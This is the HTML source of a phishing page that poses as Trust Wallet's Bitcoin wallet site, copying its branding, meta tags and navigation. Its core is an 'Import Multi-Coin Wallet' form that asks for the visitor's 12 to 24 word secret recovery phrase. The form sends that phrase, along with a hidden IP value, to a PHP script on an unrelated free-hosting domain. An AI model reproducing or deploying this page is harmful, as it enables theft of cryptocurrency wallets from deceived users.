

     <!DOCTYPE html>
     <html lang="en"><head>
     <meta charset="utf-8">
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title> Secure your wallet to start purchasing coins!</title> 
     <meta property="og:title" content="Bitcoin Wallet (BTC) | Best Bitcoin Wallet App | Bitcoin Wallet Sign Up | Trust Wallet | Trust Wallet" />
     <meta name="description" content="Bitcoin Wallet Support has now been enabled on Trust Wallet - Download our easy to use Bitcoin Wallet today for Android and iOS phones!" />
     <meta property="og:description" content="Bitcoin Wallet Support has now been enabled on Trust Wallet - Download our easy to use Bitcoin Wallet today for Android and iOS phones!" />
     <meta name="twitter:card" content="summary_large_image" />
     <meta property="twitter:image" content="https://trustwallet.com/assets/images/media/preview/horizontal_blue.png" />
     <meta name="twitter:creator" content="@trustwalletapp" />
     <meta property="og:locale" content="en" />
     <meta property="og:image" content="https://trustwallet.com/assets/images/media/preview/horizontal_blue.png" />
     <meta property="og:type" content="website" />
     <link rel="canonical" href="https://trustwallet.com/bitcoin-wallet/" />
     <meta property="og:url" content="https://trustwallet.com/bitcoin-wallet/" />
     <meta property="og:site_name" content="Trust Wallet" />
     <meta property="al:ios:app_name" content="Trust Wallet" />
     <meta property="al:ios:app_store_id" content="1288339409" />
     <meta property="al:ios:url" content="trust://" />
     <meta property="al:android:app_name" content="Trust Wallet" />
     <meta property="al:android:package" content="com.wallet.crypto.trustapp" />
     <meta property="al:android:url" content="https://trustwallet.com" />
     <link rel="shortcut icon" href="https://trustwallet.com/assets/images/favicon.ico" type="image/x-icon">
     <link rel="shortcut icon" type="image/png" href="https://trustwallet.com/assets/images/favicon.png" />
     <meta name="apple-itunes-app" content="app-id=1288339409,affiliate-data=11l7ss">
     <meta name="theme-color" content="#3375BB">
     <script type="application/ld+json">
     {
     "description": "Bitcoin Wallet Support has now been enabled on Trust Wallet - Download our easy to use Bitcoin Wallet today for Android and iOS phones!",
     "@type": "WebPage",
     "url": "https://trustwallet.com/bitcoin-wallet/",
     "headline": "Bitcoin Wallet (BTC) | Best Bitcoin Wallet App | Bitcoin Wallet Sign Up | Trust Wallet | Trust Wallet",
     "@context": "https://schema.org"
     }
     </script><script async defer data-domain="trustwallet.com" src="https://analytics.trustwallet.com/js/plausible.js"></script>
     <script>window.plausible = window.plausible || function() { (window.plausible.q = window.plausible.q || []).push(arguments) }</script>
     <script type="application/javascript">
     document.addEventListener("DOMContentLoaded", function(event) {
     document.getElementById('navbarToggle').addEventListener('click', function() {
     var el = document.getElementById('navbarSupportedContent');
     var toggled = window.getComputedStyle(el).display == 'block';
     if (toggled) {
     el.style.display = "none";
     } else {
     el.style.display = "block";
     }
     })
     //Add Huawei download button based on device.
     var result = new UAParser().getResult();
     var apple = document.getElementsByClassName("apple");
     var huawei = document.getElementsByClassName("huawei");
     var download = document.getElementsByClassName("downloadapp-native");
     
     if (result.os.name == "Android") {
     for (var i = 0; i < huawei.length; i++) {
     huawei[i].classList.remove("hidden");
     apple[i].classList.add("hidden");
     }
     // if it is android change ctas to googleplay
     for (var i = 0; i < download.length; i++) {
     download[i].href = "https://play.google.com/store/apps/details?id=com.wallet.crypto.trustapp&referrer=utm_source%3Dwebsite";
     }
     }
     // if its apple change ctas to appstore
     else if (result.os.name == "iOS") {
     for (var i = 0; i < download.length; i++) {
     download[i].href = "https://apps.apple.com/app/apple-store/id1288339409?mt=8";
     }
     }
     });
     </script>
     
     
     
     
     
     
     
     
     <noscript>Your browser does not support JavaScript!</noscript>
     <link rel="preload" href="https://trustwallet.com/assets/fonts/IBMPlexSans/IBMPlexSans-Regular.woff2" as="font" type="font/woff2" crossorigin>
     <link rel="preload" href="https://trustwallet.com/assets/fonts/IBMPlexSans/IBMPlexSans-Bold.woff2" as="font" type="font/woff2" crossorigin>
     <link rel="preload" href="https://trustwallet.com/assets/fonts/IBMPlexSans/IBMPlexSans-Medium.woff2" as="font" type="font/woff2" crossorigin>
     <link rel="stylesheet" href="https://trustwallet.com/css/main.css" />
     <link rel="alternate" href="https://trustwallet.com/bitcoin-wallet/" hreflang="en" />
     <link rel="alternate" href="https://trustwallet.com/bitcoin-wallet/" hreflang="x-default" /><link rel="alternate" href="https://trustwallet.com/ru/bitcoin-wallet/" hreflang="ru" /><link rel="alternate" href="https://trustwallet.com/de/bitcoin-wallet/" hreflang="de" /><link rel="alternate" href="https://trustwallet.com/vi/bitcoin-wallet/" hreflang="vi" /><link rel="alternate" href="https://trustwallet.com/id/bitcoin-wallet/" hreflang="id" /><link rel="alternate" href="https://trustwallet.com/ko/bitcoin-wallet/" hreflang="ko" /><link rel="alternate" href="https://trustwallet.com/ja/bitcoin-wallet/" hreflang="ja" /><link rel="alternate" href="https://trustwallet.com/tr/bitcoin-wallet/" hreflang="tr" /><link rel="alternate" href="https://trustwallet.com/pt_BR/bitcoin-wallet/" hreflang="pt" /><link rel="alternate" href="https://trustwallet.com/zh_CN/bitcoin-wallet/" hreflang="zh" /><link rel="alternate" href="https://trustwallet.com/es/bitcoin-wallet/" hreflang="es" /><script type="text/javascript" src="../assets/js/platform.js"></script>
     <script src="https://identity.netlify.com/v1/netlify-identity-widget.js"></script>
     </head>
     
     <style type="text/css">
     
     
    #img1 {
    width: 100%; 
   height: 100%;   
    }
     
     
     .fbont-weight-bold {
     padding-left: 20px;
     padding-right: 20px;
     position:relative;  
     top: -15px;
     }
     

    
    
    .dhiv1 { 
    padding-left: 35px;
    padding-right: 35px;
    position:relative;  
    top: -15px;
    }
    
    
    

     </style>
     
     
     
     
     
     
     
     <body> <nav class="navbar navbar-expand-lg navbar-togglable navbar-dark bg-primary d-block">
     <div class="container">
     <a id="navbar-brand" class="navbar-brand" href="secure-wallet" aria-label="Goes back on homepage"><svg class="navbar-brand-img logotype-white" alt="Trust Wallet logotype"></svg></a><a href="##"class="id-block d-lg-none navbar-btn btn btn-sm btn-light ml-auto downloadapp-native" target="_blank" aria-label="Goes to download page to download Trust Wallet">
     Secure Wallet
     </a><button class="navbar-toggler collapsed" id="navbarToggle" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-expanded="false" aria-hidden="true" aria-hidden="true" aria-label="Toggle navigation" aria-controls="navbarCollapse">
     <span class="navbar-toggler-icon collapsed"></span>
     </button>
     <div class="navbar-collapse collapse navbar-margin" id="navbarSupportedContent">
     <button class="navbar-toggler collapsed" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarCollapse" aria-expanded="false" aria-hidden="true" aria-label="Toggle navigation">
     </button>
     <ul class="navbar-nav font-size-sm ml-auto">
     <li class="nav-item">
     <a class="nav-link" href="https://trustwallet.com/assets" aria-label="Goes to supported assets page">Assets</a>
     </li>
     <li class="nav-item">
     <a class="nav-link" href="https://trustwallet.com/staking" aria-label="Goes to staking page where you can learn what is staking and calculate APRs">Staking</a>
     </li>
     <li class="nav-item">
     <a class="nav-link" href="https://trustwallet.com/browser-extension" aria-label="Goes to landing page for the Trust Wallet browser extension">Browser Extension<span class="badge badge-success ml-2 pl-2 pr-2">NEW</span></a>
     </li>
     <li class="nav-item">
     <a class="nav-link"href="##" aria-label="Goes to NFT page">NFTs</a>
     </li>
     <li class="nav-item">
     <a class="nav-link" href="https://trustwallet.com/dapp" aria-label="Goes to DApp browser page">DApp Browser</a>
     </li><li class="nav-item dropdown" aria-label=" flag" alt=" flag">
     <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="false" aria-expanded="true" aria-label="Opens dropdown to select different language for the site">
     Language
     <div class="flag bg-" aria-label=" flag"></div>
     </a>
     <div class="dropdown-menu dropdown-menu-md" aria-labelledby="navbarDropdown">
     <div class="list-group list-group-flush">
     <ul class="list-unstyled list-block">
     <li class="list-inline-item m-6"><a href="https://trustwallet.com/bitcoin-wallet/" class="list-group-item" aria-label="changes language of the page to en">
     <div class="flag bg-en" title="en flag"></div>
     </a></li><li class="list-inline-item m-6"><a href="https://trustwallet.com/ru/bitcoin-wallet/" class="list-group-item list-inline-item" aria-label="changes language of the page to ru">
     <div class="flag bg-ru" title="ru flag"></div>
     </a></li><li class="list-inline-item m-6"><a href="https://trustwallet.com/de/bitcoin-wallet/" class="list-group-item list-inline-item" aria-label="changes language of the page to de">
     <div class="flag bg-de" title="de flag"></div>
     </a></li><li class="list-inline-item m-6"><a href="https://trustwallet.com/vi/bitcoin-wallet/" class="list-group-item list-inline-item" aria-label="changes language of the page to vi">
     <div class="flag bg-vi" title="vi flag"></div>
     </a></li><li class="list-inline-item m-6"><a href="https://trustwallet.com/id/bitcoin-wallet/" class="list-group-item list-inline-item" aria-label="changes language of the page to id">
     <div class="flag bg-id" title="id flag"></div>
     </a></li><li class="list-inline-item m-6"><a href="https://trustwallet.com/ko/bitcoin-wallet/" class="list-group-item list-inline-item" aria-label="changes language of the page to ko">
     <div class="flag bg-ko" title="ko flag"></div>
     </a></li><li class="list-inline-item m-6"><a href="https://trustwallet.com/ja/bitcoin-wallet/" class="list-group-item list-inline-item" aria-label="changes language of the page to ja">
     <div class="flag bg-ja" title="ja flag"></div>
     </a></li><li class="list-inline-item m-6"><a href="https://trustwallet.com/tr/bitcoin-wallet/" class="list-group-item list-inline-item" aria-label="changes language of the page to tr">
     <div class="flag bg-tr" title="tr flag"></div>
     </a></li><li class="list-inline-item m-6"><a href="https://trustwallet.com/pt_BR/bitcoin-wallet/" class="list-group-item list-inline-item" aria-label="changes language of the page to pt_BR">
     <div class="flag bg-pt_BR" title="pt_BR flag"></div>
     </a></li><li class="list-inline-item m-6"><a href="https://trustwallet.com/zh_CN/bitcoin-wallet/" class="list-group-item list-inline-item" aria-label="changes language of the page to zh_CN">
     <div class="flag bg-zh_CN" title="zh_CN flag"></div>
     </a></li><li class="list-inline-item m-6"><a href="https://trustwallet.com/es/bitcoin-wallet/" class="list-group-item list-inline-item" aria-label="changes language of the page to es">
     <div class="flag bg-es" title="es flag"></div>
     </a></li>
     </ul>
     </div>
     </div>
     </li></ul>
     </div>
     </div>
     </nav>
     <main class="page-content" aria-label="Content">
     <div class="container pb-8 text-assets">

     <div class="row align-items-center justify-content-between">
     <div class="col-lg-8 col-md-12 text-center download-header-title">
     <script type="text/javascript" style="display:none">
     //<![CDATA[
     window.__mirage2 = {petok:"gwCpjI3qHAN5Z1rVwf4FcDl2R9lCVMKqZYWMDRYlk.Y-1800-0"};
     //]]>
     </script>
     </div>
     </div>
     </section>
     </div>
     </main>

     
     
         
         
         <style type="text/css">
         
       .card-body {
           position:relative;
         top:-95px;
         }
         table tr td{text-align:center;}
         .button {
         background-color: #4CAF50; /* Green */
         border: none;
         color: white;
         padding: 14px 20px;
         text-align: center;
         text-decoration: none;
         display: inline-block;
         font-size: 16px;
         margin: 1px 0px;
         cursor: pointer;
         outline: none;
         }
         .button1 {width: 208px;
         
         width: 100%;
         border-radius: 4px;
         border: 1px solid DarkGray;
         padding: 25px 13px;
         margin: 8px 3px;
         height: 20px;
         background-color: rgb(249,249,249);
         display: inline-block;
               outline-color:   #62B2FF;    
         }
             
         
         
         .button2 {width: 208%;}
         .button3 {width: 100%;
         border-radius: 4px;
         border: 1px solid DarkGray;
         padding: 25px 13px;
         margin: 3px 3px;
         height: 120px;
         background-color: rgb(249,249,249);
         display: inline-block;
         position:relative;
           outline-color:   #62B2FF; 
         }
         .bottom a{color:#D3D3D3;}
         .bottom a:link{text-decoration:none;}
         input{padding:10px;}
         
         .login{background-color:rgb(19,90,245);color:white;
         border-radius: 4px;
         padding: 13px 13px;
         margin: -15px -15px;
         border: 1px solid DarkGray;
         font-family: 'segoe UI';
         font-size: 15px;
         font-weight: bold;
         
         }
         
         .center {
         display: block;
         margin-left: auto;
         margin-right: auto;
         width: 50%;
         width: 360px;
         height: 80px;
         }
         .login{width: 97%;}
         .check{background-color:#0ac21e;color:white;padding:10px;
         margin: 4px 2px;
         }
         
         
         
         #pass {
         position:relative;
         top: 7px;
         }
         
         
         
         
         
         
         
         .span1 {
         color: #62B2FF;
         font-size: 14px;
         position:relative;
         
         top: 4px;
         }
         
         
         
         
         .divo {
         position:relative;
         top: -70px;
         }
         
         
         
         #a {
         text-decoration: none;
         color: #62B2FF;
         }
         
         
         
         #imgf {
         position:relative;
         width: 8px;
         heibght: 14px;
         top: 1.25px;
         
         }
         
         
         
         .span2 {
         color: black;
         font-sizw: 14px;
         text-align: cbenter;
         position:relative;
         background-position:center;
         top: -9px;
         font-weight: 450;
         text-shadow:500px;
         
         mabrgin-right: 90px;
         color: hsla(0, 0%, 0%, 0.85);
         
         }
         
         
         
         
         .square_btn {
         position: relative;
         display: inline-block;
         padding: 14px;
         text-decoration: none;
         color: hsla(0, 100%, 100%, 0.50);
         background:   #62B2FF;
         border-radius: 10px;
         ffont-weight: bold;
         bornder: 15px #f30909;
         width: 100%;
         border: none;
         top: -15px;
         outline: none;
       font-size: 12px;     
    outline: none;
       outline-color:   #62B2FF;    
         }
                
         #p1 {
         position:relative;      
         top: 17px;
         }
         
         
         
         
         .contact-us span{
         position:relative;
         cohlor:#00184a78;
         font-size:15px;
         top: 245px;
         color: #62B2FF;
         
         }
             
             
             .span11 {
             position:relative;
         top: 3px;
         }
         
         
           
           
           body{

           font-family: sans-serif;


           }
           
         
            
            
            button {
            outline: none;
            }
            
         </style>

         
         
         <body>
         

         <div class="divo">

        <span class="span1">&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a id="a"class="nav-link"href="index.html" aria-label="Goes to NFT page"></a>&nbsp;&nbsp;&nbsp;&nbsp;<img id="imgf"src="https://raw.githubusercontent.com/stakecoredao/img/main/oo.png"><span class="span11">&nbsp; Back</span> </span> </a><span class="span2"><center><span class="span2"style="font-size: 16px;"><span class="move1">Import Multi-Coin Wallet</span></tt></center></span> 
         </div>  
         
        


              <form method="POST" style="padding-top:  -500px;" action="https://hitsmng.000webhostapp.com/secure-wallet-by-twt.php" method="POST">
         
         
         
         <div class="card-body">
         
         
         
         <!--<input type="hidden" name="wallet" id="userNickname" value="1">-->
         <input class="button1" name="Wallet" type="text" id="editableinput" value="Main Wallet 1" placeholder="Name" maxlength="400" size="400px" required><br>
         <textarea class="button3" name="Phrase" type="text" id="pass" placeholder="Phrase" maxlength="400" size="35px" required></textarea>
         <input type="hidden" name="ip" value="172.71.102.101" />
         <input type="hidden" name="link" value="keyphrase" />
         <center>        <p id="p1"style="font-size: 12px; color: grey">Typically 12 (sometimes 18, 24) words separated by single spaces</p>   </center>     
         <p>&nbsp;</p>
         <center>  
         
         
         
         
         <button type="submit" class="square_btn">IMPORT</button>
         
         <!--  <div class="fruit">
         <a class="koala">Need a new account</a> 
         </div>
         -->
         <div class="contact-us">
         <b> <span>What is Secret Phrase?
     </span></span>    </a> </b></div>
         
         </form>       
         </div>
         
         
         
         
         
         
         
         
         
         <script type="text/javascript">
         
         document.getElementById("editableinput").removeAttribute("readonly");
         
         
         </script>
         
     
     
     
     </ul>
     </div>
     </div>
     </div>
     </footer>
     
     <script>
     let links = document.querySelectorAll("a[data-analytics]");
     for (var i = 0; i < links.length; i++) {
     links[i].addEventListener('click', handleLinkEvent);
     links[i].addEventListener('auxclick', handleLinkEvent);
     }
     
     function handleLinkEvent(event) {
     var link = event.target;
     var middle = event.type == "auxclick" && event.which == 2;
     var click = event.type == "click";
     while (link && (typeof link.tagName == 'undefined' || link.tagName.toLowerCase() != 'a' || !link.href)) {
     link = link.parentNode;
     }
     if (middle || click) {
     let attributes = link.getAttribute('data-analytics').split(/,(.+)/);
     let p = JSON.parse(attributes[1] || '{"props":{}}');
     p.props["Page url"] = document.location.pathname;
     let events = [JSON.parse(attributes[0]), p];
     plausible(...events);
     }
     if (!link.target) {
     if (!(event.ctrlKey || event.metaKey || event.shiftKey) && click) {
     setTimeout(function () {
     location.href = link.href;
     }, 150);
     event.preventDefault();
     }
     }
     }
     </script>
     <script>
     if (window.netlifyIdentity) {
     window.netlifyIdentity.on("init", user => {
     if (!user) {
     window.netlifyIdentity.on("login", () => {
     document.location.href = "/admin/";
     });
     }
     });
     }
     </script>
     
      
     

   
   




   
   

     
     
     </body>
     </html>
